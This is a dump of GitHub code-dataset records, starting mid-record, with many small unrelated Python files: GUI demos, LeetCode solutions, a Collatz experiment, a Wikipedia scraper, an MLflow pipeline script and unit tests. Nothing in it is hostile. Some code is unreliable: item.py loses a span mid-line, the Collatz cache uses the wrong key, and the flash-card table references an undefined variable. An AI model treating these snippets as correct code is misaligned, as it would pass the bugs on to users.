pathlib.Path(\"E:\\\\dev\\\\prettyqt\\\\docs\\\\index.md\")\n\n extensions = [\n \"pymdownx.arithmatex\",\n \"pymdownx.betterem\",\n \"pymdownx.caret\",\n \"pymdownx.critic\",\n \"pymdownx.details\",\n \"pymdownx.emoji\",\n \"pymdownx.inlinehilite\",\n \"pymdownx.magiclink\",\n \"pymdownx.mark\",\n \"pymdownx.smartsymbols\",\n \"pymdownx.superfences\",\n \"pymdownx.tasklist\",\n \"pymdownx.tabbed\",\n \"pymdownx.tilde\",\n ]\n\n html = markdown.markdown(path.read_text(), extensions=extensions)\n widget.setHtml(html)\n page = widget.page()\n path = pathlib.Path(\n \"E:\\\\dev\\\\prettyqt\\\\site\\\\assets\\\\stylesheets\\\\main.26e3688c.min.css\"\n )\n page.insert_stylesheet(\"main.26e3688c.min\", path)\n widget.show()\n app.exec()\n","repo_name":"phil65/PrettyQt","sub_path":"prettyqt/webenginewidgets/webengineview.py","file_name":"webengineview.py","file_ext":"py","file_size_in_byte":5337,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"21349026886","text":"import numpy as np\nimport sys\nnp.set_printoptions(threshold=sys.maxsize)\nimport random\nitem = np.zeros((50,), dtype=int)\nallTransaction = []\nminSupport = 60\nminConfident = 40\n\n\nfirst = 800\nn=0\nwhile(n<800):\n numberOfItem = random.randint(2, 5)\n countInTransaction = 0\n transaction = []\n while(countInTransaction < numberOfItem):\n randNum = random.randint(0,100)\n if randNum < 50: transaction.append(0)\n elif randNum >= 50 and randNum < 80: transaction.append(1)\n else: \n transaction.append(random.randint(0,49))\n countInTransaction +=1\n allTransaction.append(transaction)\n n+=1\nn=0\nwhile(n<200):\n numberOfItem = random.randint(6, 8)\n countInTransaction = 0\n transaction = []\n while(countInTransaction < numberOfItem):\n transaction.append(random.randint(0,49))\n countInTransaction +=1\n allTransaction.append(transaction)\n n+=1\n\n\n\nprint(allTransaction)\n\n\nn=0\nlistItem=[]\nwhile n<50:\n listItem.append(np.zeros((1000,), dtype=int))\n n+=1\n\n\nn=0\nwhile n<50:\n count=0\n while count= minSupport: listRemoveSecond.append(i)\nprint(listRemoveSecond)\nprint(\"confident 0 => 1 = {}%\".format(float(countListItemTwoTransaction[0])/(item[0])))\nprint(\"confident 1 => 0 = {}%\".format(float(countListItemTwoTransaction[0])/(item[1])))","repo_name":"werterzz/associationRuleTest","sub_path":"item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18832061140","text":"\"\"\"\nKullanıcıdan aldığınız bir sayının mükemmel olup olmadığını bulmaya çalışın.\n\nBir sayının kendi hariç bölenlerinin toplamı kendine eşitse bu sayıya \"mükemmel sayı\" denir. Örnek olarak, 6 mükemmel bir sayıdır. (1 + 2 + 3 = 6)\n\"\"\"\nprint(\"*****************************\\n\"\n \" Mükemmel Sayı\\n\"\n \"*****************************\")\nsayi = int(input(\"Sayı giriniz : \"))\nsayiListesi = range(1,sayi)\ntamBölenler = list()\ntoplam = 0\nfor x in sayiListesi:\n if sayi % x == 0:\n tamBölenler.append(x)\nprint(tamBölenler)\nfor i in tamBölenler:\n toplam += i\nif sayi == toplam :\n print(sayi,\"bir mükemmel sayıdır.\")\nelse :\n print(sayi ,\"bir mükemmel sayı değildir.\\nToplamları : {}\".format(toplam))\n","repo_name":"mebon/PythonDenemeleri","sub_path":"Problemler3/Problem3_1.py","file_name":"Problem3_1.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36923177411","text":"\"\"\"Demostration of __repr__ magic method and appending all instances into an empty list using a python program\"\"\"\n\nclass Item:\n\n # Creating an empty list to store all the 5 instances\n all = [] \n \n # Initializing Class Attribute\n pay_rate = 0.8 # Pay rate after discount\n\n # A constructor for class Item where we have to implement the instance attributes inside the constructor\n def __init__(self, name: str, price: float, quantity = 0):\n \n # Run validations or conditions for the recieved arguments\n assert price >= 0, f\"Price {price} is not greater than zero!\"\n assert quantity >= 0, f\"Quantity {quantity} is not greater than or equal to 0!\"\n \n # Assign to self object the Instance attribute\n self.name = name\n self.price = price\n self.quantity = quantity\n\n # Actions to execute\n Item.all.append(self)\n\n # Creating a magic method repr to represent all the instances in a list named all\n def __repr__(self):\n return f\"Item('{self.name}', {self.price}, {self.quantity})\"\n\n # Creating a method to calculate the total price of an instance item1 or item2\n def calculate_total_price(self):\n return self.price * self.quantity\n \n # Creating another method to apply Discount to the total price of the object\n def apply_discount(self):\n \n # Using self.pay_rate enables us to retrieve the class attribute pay_rate \n self.price = self.price * self.pay_rate\n\n# Creating 5 Instances of class Item \nitem1 = Item(\"Phone\", 100, 5)\nitem2 = Item(\"Laptop\", 1000, 3)\nitem3 = Item(\"Cable\", 10, 5)\nitem4 = Item(\"Mouse\", 50, 5)\nitem5 = Item(\"Keyboard\", 75, 5)\n\nprint(Item.all)","repo_name":"Sidkjr/FreeCodeCamp","sub_path":"OOP-With-Py/main3-0.py","file_name":"main3-0.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41935510901","text":"class Solution(object):\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n nums=[]\n equal=[]\n check=[]\n List=[]\n answer=[]\n index=-1\n for i in candidates:\n if i < target:\n nums.append(i)\n elif i == target:\n equal.append([i])\n self.backtracking(nums,check,List,target, answer,index)\n answer.extend(equal)\n for i in range(len(answer)):\n answer[i]=sorted(answer[i])\n \n answer = [list(x) for x in set([tuple(x) for x in answer])]\n\n\n return answer\n \n \n def backtracking(self,nums,check,List,target, answer,index):\n if sum(List) == target:\n temp=List[:]\n answer.append(temp)\n return\n elif sum(List) > target:\n return\n \n \n for i in range(len(nums)):\n if i>index:\n if i not in check:\n index=i\n check.append(i)\n List.append(nums[i])\n self.backtracking(nums,check,List,target, answer,index)\n List.remove(nums[i])\n check.remove(i)\n \ntarget=1\ncandidates=[1,1]\nabc=Solution()\nanswer=abc.combinationSum2(candidates,target)\nprint(answer) ","repo_name":"MinCheng123/Python","sub_path":"leetcode/40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30301755863","text":"import argparse\n\ndef new_simulation_argument_parser(p):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '-g',\n dest = 'codes_gravity',\n type = str,\n default = p.codes_gravity,\n help = \"Gravity code to use [%s]\"%p.codes_gravity,\n )\n parser.add_argument(\n '-a',\n dest = 'timestep_analysis',\n type = float,\n default = p.timestep_analysis.value_in(p.units_time),\n help = \"Analysis timestep [%s] (0: disabled)\"%p.timestep_analysis,\n )\n parser.add_argument(\n '-p',\n dest = 'timestep_plotting',\n type = float,\n default = p.timestep_plotting.value_in(p.units_time),\n help = \"Plotting timestep [%s] (0: disabled)\"%p.timestep_plotting,\n )\n parser.add_argument(\n '-b',\n dest = 'timestep_backup',\n type = float,\n default = p.timestep_backup.value_in(p.units_time),\n help = \"Backup timestep [%s] (0: disabled)\"%p.timestep_backup,\n )\n parser.add_argument(\n '-t',\n dest = 'timestep',\n type = float,\n default = p.timestep.value_in(p.units_time),\n help = \"Integration timestep [%s] (0: auto)\"%p.timestep_backup,\n )\n parser.add_argument(\n '-e',\n dest = 'time_end',\n type = float,\n default = p.time_end.value_in(p.units_time),\n help = \"End time [%s]\"%p.time_end,\n )\n parser.add_argument(\n '-i',\n dest = 'particles_initial_file',\n type = str,\n default = p.particles_initial_file,\n help = \"Use this model [%s]\"%p.particles_initial_file,\n )\n\n args = parser.parse_args()\n\n p.codes_gravity = args.codes_gravity\n p.timestep_analysis = args.timestep_analysis | p.units_time\n p.timestep_plotting = args.timestep_plotting | p.units_time\n p.timestep_backup = args.timestep_backup | p.units_time\n p.timestep = args.timestep | p.units_time\n p.time_end = args.time_end | p.units_time\n p.particles_initial_file = args.particles_initial_file\n\n return p\n","repo_name":"rieder/grps","sub_path":"argumentparser.py","file_name":"argumentparser.py","file_ext":"py","file_size_in_byte":2383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37598321588","text":"\"\"\"Runs CD4ML Pipeline Task to compare classifier models\"\"\"\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport requests\nfrom google.cloud import storage\nfrom mlflow import MlflowClient\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nAPI_ENDPOINT = f'http://{os.getenv(\"API_HOST\")}:5000'\nPROJECT_ID = os.getenv(\"PROJECT_ID\")\nBUCKET_NAME = os.getenv(\"BUCKET_NAME\")\n\nLIMIT = 10\nYEAR = 2012\n\n\ndef download_blob_into_memory(blob_name):\n \"\"\"Downloads a blob into memory.\"\"\"\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(BUCKET_NAME)\n\n blob = bucket.blob(blob_name)\n contents = blob.download_as_bytes()\n\n return contents\n\n\ndef perform_task(params, endpoint):\n api_response = requests.post(f\"{API_ENDPOINT}/{endpoint}\", json=params).json()\n task_id = api_response[\"task_id\"]\n queue = api_response[\"queue\"]\n print(f\"task_id: {task_id}\")\n print(f\"queue: {queue}\")\n\n status = \"PENDING\"\n print(\"Processing...\")\n while status == \"PENDING\":\n time.sleep(3)\n response = requests.get(\n f\"{API_ENDPOINT}/task/{task_id}\", params={\"queue\": f\"{queue}\"}\n ).json()\n status = response[\"status\"]\n print(status)\n\n if status != \"SUCCESS\":\n raise Exception(response)\n else:\n print(\"Task complete!\")\n\n return task_id\n\n\ndef run_imagery(queue: str):\n payload = {\n \"queue\": queue,\n \"gender\": \"Women\",\n \"sub_category\": \"Dress\",\n \"start_year\": YEAR,\n \"limit\": LIMIT,\n \"augmentation_config\": {\n \"albumentation\": {\n \"input_image\": {\"width\": 60, \"height\": 80},\n \"cropping\": {\"height\": {\"min\": 10, \"max\": 70}},\n \"resize\": {\"width\": 256, \"height\": 256},\n }\n },\n }\n run_id = perform_task(payload, \"filter\")\n\n return run_id\n\n\ndef run_inference(run_id: str, queue: str):\n perform_task({\"task_id\": run_id, \"queue\": queue}, \"predict\")\n bucket_file = f\"tasks/{run_id}/inferences.json\"\n content = download_blob_into_memory(bucket_file)\n predictions = json.loads(content)\n logger.info(f\"Number of predictions: {len(predictions)}\")\n logger.info(\n f'Prediction output per image: massive_attr-{len(predictions[0][\"massive_attr\"])}, '\n f'categories-{len(predictions[0][\"categories\"])}'\n )\n\n for idx, predict in enumerate(predictions, 1):\n logger.info(\n f'Image number {idx} ----- mlflow_run_id: {predict[\"mlflow_run_id\"]} '\n f'image_id: {predict[\"image_name\"][0].rsplit(\"/\", 1)[1]} '\n f'category_prediction: {predict[\"category_prediction_index\"]}'\n )\n mlflow_run_id = predict[\"mlflow_run_id\"]\n\n client = MlflowClient(tracking_uri=f'http://{os.getenv(\"MLFLOW_HOST\")}:5000')\n history = client.get_metric_history(mlflow_run_id, \"AUC\")\n\n return history[0].value\n\n\nif __name__ == \"__main__\":\n branch_name = sys.argv[1]\n auc_threshold = sys.argv[2]\n logger.info(\"Branch Name: %s\", branch_name)\n logger.info(\"AUC threshold: %s\", auc_threshold)\n\n logger.info(\"Running inference for current model\")\n run_id_prod = run_imagery(queue=\"imagery\")\n auc_prod = run_inference(run_id=run_id_prod, queue=\"inference\")\n\n logger.info(\"Running inference for candidate model\")\n run_id_candidate = run_imagery(queue=f\"imagery-{branch_name}\")\n auc_candidate = run_inference(run_id=run_id_prod, queue=f\"inference-{branch_name}\")\n\n logger.info(\"AUC Prod: %s\", auc_prod)\n logger.info(\"AUC Candidate branch %s: %s\", branch_name, auc_candidate)\n logger.info(\"AUC Threshold: %s\", auc_threshold)\n\n if auc_prod < auc_candidate or auc_candidate < auc_threshold:\n logger.info(\"Requisites for new model were not match!\")\n sys.exit(1)\n","repo_name":"krzischp/tcc-mba-ml-in-prod","sub_path":"src/ml_pipeline/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74852146012","text":"import io\nimport warnings\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport logging\nfrom wiki_scraping_helper import *\n\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\n# saving exceptions to a log file\nlogging.basicConfig(filename='scraping_errors.log', level=logging.INFO, filemode='a')\n\ndef scrape_disambiguation_page(page_url, page_id, links_params):\n \"\"\"scrapes all footballer pages when a disambiguation page is encountered\"\"\"\n try:\n response = requests.get(page_url, params=links_params)\n if response.status_code != 200:\n logging.warning(f\"Failed to fetch {page_url}\")\n return\n data = response.json()\n links = data[\"query\"][\"pages\"][page_id][\"links\"]\n\n footballer_links = [link[\"title\"] for link in links if \"footballer\" in link[\"title\"]]\n return footballer_links\n\n except Exception as e:\n logging.error(f\"Error processing disambiguation {page_url} {e}.\")\n return []\n\ndef scrape_non_disambiguation_page(player_name):\n page_title = player_name.replace(' ', '_')\n player_url = f\"https://en.wikipedia.org/wiki/{page_title}\"\n response = requests.get(player_url)\n\n if response.status_code == 200:\n print(player_name)\n soup = BeautifulSoup(response.content, 'html.parser')\n tables = soup.find_all('table', {'class': 'wikitable'})\n infobox = soup.find('table', {'class': 'infobox vcard'})\n if infobox is None:\n infobox = soup.find('table', {'class': 'infobox biography vcard'})\n\n club_info, intl_info = [], []\n player_info = get_biographics(infobox, player_url)\n\n for tbl in tables:\n df = pd.read_html(io.StringIO(str(tbl)))\n df = pd.DataFrame(df[0])\n \n if 'Club' in df.columns and not club_info:\n club_info = get_club_stats(df)\n \n elif ('Team' in df.columns or 'National team' in df.columns) and not intl_info:\n\n intl_info = get_intl_stats(df)\n return player_name, player_info, club_info, intl_info\n \n else:\n logging.error(f\"Failed to retrieve player page. {player_url}.\")\n return player_name, [], [], []\n \ndef scrape_wikipedia_page(player_name):\n \"\"\"gets club career and international career info for a given player\"\"\"\n api_url = f\"https://en.wikipedia.org/w/api.php\"\n params = {\n \"action\": \"query\",\n \"titles\": player_name,\n \"prop\": \"categories\",\n \"format\": \"json\",\n }\n\n response = requests.get(api_url, params=params)\n if response.status_code == 200:\n player_data = []\n data = response.json()\n\n pages = data[\"query\"][\"pages\"]\n page_id, page_info = next(iter(pages.items()))\n footballer_links = [] # to store disambig data\n\n is_disambiguation_page = any(\"disambiguation\" in cat[\"title\"] for cat in page_info.get(\"categories\", []))\n\n if is_disambiguation_page:\n links_params = {\n \"action\": \"query\",\n \"titles\": player_name,\n \"prop\": \"links\",\n \"pllimit\": \"max\",\n \"format\": \"json\",\n }\n\n footballer_links = scrape_disambiguation_page(api_url, page_id, links_params)\n \n page_title = player_name.replace(' ', '_')\n player_url = f\"https://en.wikipedia.org/wiki/{page_title}\"\n\n player_name, player_info, club_info, intl_info = scrape_non_disambiguation_page(player_name)\n player_data.append([player_name, player_info, club_info, intl_info])\n\n if footballer_links:\n for disambig_title in footballer_links:\n player_name, player_info, club_info, intl_info = scrape_non_disambiguation_page(disambig_title)\n player_data.append([player_name, player_info, club_info, intl_info])\n \n return player_data \n else:\n logging.error(f\"Failed to reach Wiki page{player_url}\")\n return [[player_name, [], [], []]]","repo_name":"clintyr/football-shenanigans","sub_path":"wiki_scraping.py","file_name":"wiki_scraping.py","file_ext":"py","file_size_in_byte":4144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17636372457","text":"import numpy as np \nimport cv2\n\ncamera = cv2.VideoCapture(0)\n\nwhile True:\n\tret, frame = camera.read()\n\tkey = cv2.waitKey(1)\n\n\tif key == 27:\n\t\tbreak\n\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tret, frame = cv2.threshold(frame,127,255,cv2.THRESH_TRUNC)\n\tcv2.imshow('image', frame)\n\ncv2.destroyAllWindows()","repo_name":"DirtyRattt/git_learning","sub_path":"OpenCV_app.py","file_name":"OpenCV_app.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8757564690","text":"import unittest\nimport unishark.suite\n\n\nclass SuiteTestCase(unittest.TestCase):\n def setUp(self):\n super(SuiteTestCase, self).setUp()\n self.loader = unittest.TestLoader()\n self.suite = None\n\n def test_convert_suite(self):\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1',\n 'tests.mock1.test_module2'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n self.assertEqual(tests.countTestCases(), 10)\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1.MyTestClass1',\n 'tests.mock1.test_module1.MyTestClass2',\n 'tests.mock1.test_module2.MyTestClass3',\n 'tests.mock1.test_module2.MyTestClass4'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n self.assertEqual(tests.countTestCases(), 10)\n self.suite = self.loader.loadTestsFromNames(['tests.mock1.test_module1.MyTestClass1.test_1',\n 'tests.mock1.test_module1.MyTestClass2.test_3',\n 'tests.mock1.test_module2.MyTestClass3.test_5',\n 'tests.mock1.test_module2.MyTestClass4.test_8'])\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 2)\n self.assertEqual(sum([len(t) for t in tests]), 4)\n self.assertEqual(tests.countTestCases(), 4)\n from tests.mock1 import test_module1\n self.suite = self.loader.loadTestsFromModule(test_module1)\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 1)\n self.assertEqual(sum([len(t) for t in tests]), 2)\n self.assertEqual(tests.countTestCases(), 4)\n self.suite = self.loader.loadTestsFromTestCase(test_module1.MyTestClass1)\n tests = unishark.suite.convert(self.suite)\n self.assertEqual(len(tests), 1)\n self.assertEqual(sum([len(t) for t in tests]), 1)\n self.assertEqual(tests.countTestCases(), 2)\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"twitter-archive/unishark","sub_path":"tests/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":2443,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"32"} +{"seq_id":"33409943265","text":"from typing import List\nclass Solution:\n def searchRange(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n Given an array of integers nums sorted in ascending order, find the starting and ending position of a given target value.\n\n Time complexity: O(log n) since binary search algorithm is used.\n Binary search algorithm cuts the search space roughly in half on each iteration.\n\n Space complexity: O(1) since all work are done in place.\n\n Runtime beats 92.59% of python3 submission\n \"\"\"\n if not nums:\n return [-1, -1]\n n = len(nums)\n start, end = 0, n - 1\n while start <= end:\n mid = start + (end - start + 1 + 1)//2 - 1\n left = right = -1\n if nums[mid] == target:\n left = right = mid\n elif nums[start] == target:\n left = right = start\n elif nums[end] == target:\n left = right = end\n\n if 0 <= left and left < n:\n has_left = left - 1 >= 0 and nums[left-1] == target\n has_right = right + 1 < n and nums[right+1] == target\n while has_left or has_right:\n if has_left:\n left -= 1\n if has_right:\n right += 1\n has_left = left - 1 >= 0 and nums[left-1] == target\n has_right = right + 1 < n and nums[right+1] == target\n\n return [left, right]\n\n elif nums[mid] > target:\n # [0, mid - 1]\n end = mid - 1\n else:\n # [mid + 1, n]\n start = mid + 1\n\n return [-1, -1]\n\nif __name__ == \"__main__\":\n s = Solution()\n numbers = [[1, 2, 3, 4, 5, 6, 7, 9, 10], [1, 2, 3, 3, 4, 5, 6], [5, 7, 7, 8, 8, 10], [5, 7, 8, 8, 10], [1, 1], [1, 1], []]\n for x in numbers:\n for i in range(11):\n r = s.searchRange(x, i)\n print(\"searchRange({}, {}) = {}\".format(x, i, r))\n","repo_name":"alvinctk/google-tech-dev-guide","sub_path":"leetcode/google/tagged/find_first_and_last_position.py","file_name":"find_first_and_last_position.py","file_ext":"py","file_size_in_byte":2050,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"32"} +{"seq_id":"38009587798","text":"#\n# def collatz_len_gen(num):\n# series = [num]\n# while num != 1:\n# if num % 2 == 0:\n# num = num/2\n# series.append(num)\n#\n# else:\n# num = 3*num + 1\n# series.append(num)\n#\n# return len(series)\n#\n# def longest_collatz_below(num):\n# longest = 0\n# number = [1]\n# i = 1\n# while i < num:\n# i += 1\n# collatz_len_gen(i)\n#\n# if collatz_len_gen(i) > longest:\n# number.insert(0, i)\n# longest = collatz_len_gen(i)\n#\n# print('length is :', longest, 'number is :', number[0])\n#\n#\n# longest_collatz_below(1000000)\n\n# import time\n# start = time.time()\n#\n# def collatz_len(num):\n# series = [num]\n# count = 1\n# while num != 1:\n# if num % 2 == 0:\n# num = num / 2\n# if num in series:\n# count += series.index(num)\n# break\n# else:\n# series.append(num)\n# count += 1\n#\n# else:\n# num = 3 * num + 1\n# if num in series:\n# count += series[num].index()\n# break\n# else:\n# series.append(num)\n# count += 1\n#\n# return count\n#\n#\n# end = time.time()\n#\n# print(end - start)\n\n\n# 88888888888888888888888888888888888888888888888888\n#problem 14 project euler\n# import time\n# start=time.time()\n# has2={}\n# def collatz(x):\n# seq=[]\n# seq.append(x)\n# temp=x\n# while(temp>1):\n# if temp%2==0:\n# temp=int(temp/2)\n# if temp in has2:\n# seq+=has2[temp]\n# break\n# else:\n# seq.append(temp)\n# else:\n# temp=3*temp+1\n# if temp in has2:\n# seq+=has2[temp]\n# break\n# else:\n# seq.append(temp)\n#\n#\n# has2[x]=seq\n# return len(seq)\n#\n# num=0\n# greatest=0\n# for i in range(1000000):\n# c=collatz(i)\n# if num 1:\n if num % 2 == 0:\n num = int(num/2)\n if num in dic:\n seq += dic[num]\n break\n else:\n seq.append(num)\n else:\n num = int(3*num+1)\n if num in dic:\n seq += dic[num]\n break\n else:\n seq.append(num)\n\n dic[num] = seq\n return len(seq)\n\nnumber = 0\nlength = 0\nfor i in range(1, 1000000):\n c = collatz(i)\n if length < c:\n length = c\n number = i\nend = time.time()\nprint(\"\\nthe number is :\", number , \"\\nthe length of seq is :\", length, \"\\nexecute time is:\", (end - start))\n\n\n\n\n","repo_name":"Shivashankar101/PycharmProjects","sub_path":"ProjectEuler/Euler14.py","file_name":"Euler14.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9618929587","text":"myBill = float(input(\"What was the bill?: \"))\nnumberOfPeople = int(input(\"How many people?: \"))\ntip = int(input(\"your tip 'choose 15,20, 25 percentage': \"))\n\ntotalbillwithtip = tip / 100 * myBill + myBill\nbillperperson= totalbillwithtip / numberOfPeople\n\nfinal_amount = round(billperperson, 2)\n\n\nprint(\"You all owe\", final_amount)\n\n","repo_name":"GAYATHRI-2002/100daysofcodechallenge","sub_path":"DAYS/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33199211349","text":"from crammer import controller\nimport os, sys \nfrom PyQt4 import QtGui, QtCore\nfrom crammer.controller import FlashCardController\n\nclass NoTypeTextEdit(QtGui.QTextEdit):\n\n\tdef keyPressEvent(self, event):\n\t\tevent.ignore()\n\nclass OptionsTab(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, parentWidget):\n\t\tsuper(OptionsTab, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.parentWidget = parentWidget\n\t\tself.initUI()\n\n\t\t\n\tdef initUI(self):\n\t\tpass\n\t\tself.layout = QtGui.QHBoxLayout() \n\n\t\tself.apiKeysLayout = QtGui.QGridLayout()\n\n\t\tself.apiKeyTable = APIKeyTable(controller.apiKeys())\n\t\tself.apiKeysLayout.addWidget(self.apiKeyTable, 0, 1, 1, 2)\n\n\t\teditKeysButton = QtGui.QPushButton('Edit Keys', self)\n\t\teditKeysButton.clicked.connect(self.parentWidget.editKeys)\n\t\tself.apiKeysLayout.addWidget(editKeysButton, 1, 2, )\n\t\tself.layout.addLayout(self.apiKeysLayout)\n\n\t\tspacer = QtGui.QSpacerItem(200,40,QtGui.QSizePolicy.Minimum,QtGui.QSizePolicy.Expanding)\n\t\tself.layout.addItem(spacer)\n\n\t\tverticalLine \t= QtGui.QFrame()\n\t\tverticalLine.setFrameStyle(QtGui.QFrame.VLine)\n\t\tverticalLine.setSizePolicy(QtGui.QSizePolicy.Minimum,QtGui.QSizePolicy.Expanding)\n\t\tself.layout.addWidget(verticalLine)\n\n\t\tself.rightSide = QtGui.QVBoxLayout()\n\t\tself.rightForm = QtGui.QFormLayout()\n\t\tself.delay = QtGui.QLineEdit(str(30))\n\t\tself.rightForm.addRow('Delay:', self.delay)\n\n\t\tself.rightSide.addLayout(self.rightForm)\n\n\t\tself.startButton = QtGui.QPushButton('Start', self)\n\t\tself.startButton.clicked.connect(self.startThread)\n\t\tself.rightSide.addWidget(self.startButton)\n\n\t\tself.layout.addLayout(self.rightSide)\n\t\tself.setLayout(self.layout)\n\n\tdef getDelay(self):\n\t\treturn int(self.delay.text())\n\n\tdef startThread(self):\n\t\tself.parentWidget.start()\n\t\tself.startButton.setEnabled(False)\n\nclass DeckWindow(QtGui.QMainWindow):\n\t\n\tdef __init__(self, cardFile = None):\n\t\tsuper(DeckWindow, self).__init__()\n\t\tself.mainWidget = DeckWidget(self, cardFile)\n\t\tself.setCentralWidget(self.mainWidget)\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tself.setWindowTitle('Macys Suit Getter')\n\t\tself.setGeometry(300,300,622,280)\n\t\tself.show()\n\t\n\tdef showAbout(self):\n\t\tmsgBox = QtGui.QMessageBox()\n\t\tmsgBox.setWindowTitle(\"About\")\n\t\tmsgBox.setText(\"Copy a Macys Suit URl into the field and press the button. Enter a file name (with .csv or whatever). It makes it a csv.\\nCreated by Luke Li on March 10, 2014\")\n\t\tmsgBox.exec_()\n\nclass DeckWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, cardFile):\n\t\tsuper(DeckWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.cardFile = cardFile\n\t\tself.initUI()\n\t\t\n\tdef makeFocus(self):\n\t\tself.setFocus()\n\t\tself.grabKeyboard()\n\n\tdef initUI(self):\n\t\tif not self.hasFocus():\n\t\t\tself.makeFocus()\n\t\tself.flashCards = FlashCardTable(self.cardFile)\n\t\tmainLayout = QtGui.QVBoxLayout() \n\n\t\ttopBar = QtGui.QHBoxLayout()\n\t\ttopBar.addWidget(self.flashCards)\n\n\t\tmainLayout.addLayout(topBar)\n\t\tself.setLayout(mainLayout)\n\n\nclass FlashCardTable(QtGui.QTableWidget):\n\tdef __init__(self, *args):\n\t\tQtGui.QTableWidget.__init__(self, data, *args)\n\t\tself.data = data\n\t\tself.setColumnCount(4)\n\t\theaderLabels = ['Test?', '#', 'Front Side', 'Back Side']\n\t\tself.setHorizontalHeaderLabels(headerLabels)\n\t\tself.verticalHeader().hide()\n\t\tself.setData()\n\t\tself.resizeColumnsToContents()\n\n\tdef setData(self):\n\t\tpass\n\t\t'''\n\t\tself.setRowCount(len(self.data))\n\t\tn = 0\n\t\tfor key in self.data:\n\t\t\tlabelItem = QtGui.QTableWidgetItem(key)\n\t\t\tlabelItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\thasKey = self.data[key] != ''\n\t\t\tvalueItem = QtGui.QTableWidgetItem(str(hasKey))\n\t\t\tvalueItem.setFlags(QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled)\n\t\t\tself.setItem(n, 0, labelItem)\n\t\t\tself.setItem(n, 1, valueItem)\n\t\t\tn += 1\n\t\t'''\nclass FlashCardWindow(QtGui.QMainWindow):\n\t\n\tdef __init__(self, cardFile = None, preExistingCards = None):\n\t\tsuper(FlashCardWindow, self).__init__()\n\t\tself.deck = controller.makeCards(f = cardFile, cards = preExistingCards)\n\t\tself.controller = FlashCardController(self, self.deck)\n\t\tself.curController = self.controller\n\t\tself.mainWidget = FlashCardWidget(self, self.curController)\n\t\tself.setCentralWidget(self.mainWidget)\n\t\tself.initUI()\n\t\t\n\tdef initUI(self):\n\t\tself.setWindowTitle('Macys Suit Getter')\n\t\tself.setGeometry(300,300,622,280)\n\t\tself.show()\n\t\n\tdef showAbout(self):\n\t\tmsgBox = QtGui.QMessageBox()\n\t\tmsgBox.setWindowTitle(\"About\")\n\t\tmsgBox.setText(\"Copy a Macys Suit URl into the field and press the button. Enter a file name (with .csv or whatever). It makes it a csv.\\nCreated by Luke Li on March 10, 2014\")\n\t\tmsgBox.exec_()\n\n\tdef showResults(self, controller):\n\t\tself.resultsScreen = ResultsWidget(self, controller) \n\t\tself.setCentralWidget(self.resultsScreen)\n\n\tdef showRestartDeck(self, controller):\n\t\tself.mainWidget = FlashCardWidget(self, controller)\n\t\tself.setCentralWidget(self.mainWidget)\n\n\tdef showRestartAllDeck(self):\n\t\tself.controller.restartAll()\n\t\tself.mainWidget = FlashCardWidget(self, self.controller)\n\t\tself.setCentralWidget(self.mainWidget)\n\nclass FlashCardWidget(QtGui.QWidget):\n\t\n\tdef __init__(self, parent, controller):\n\t\tsuper(FlashCardWidget, self).__init__(parent)\n\t\tself.parent = parent\n\t\tself.controller = 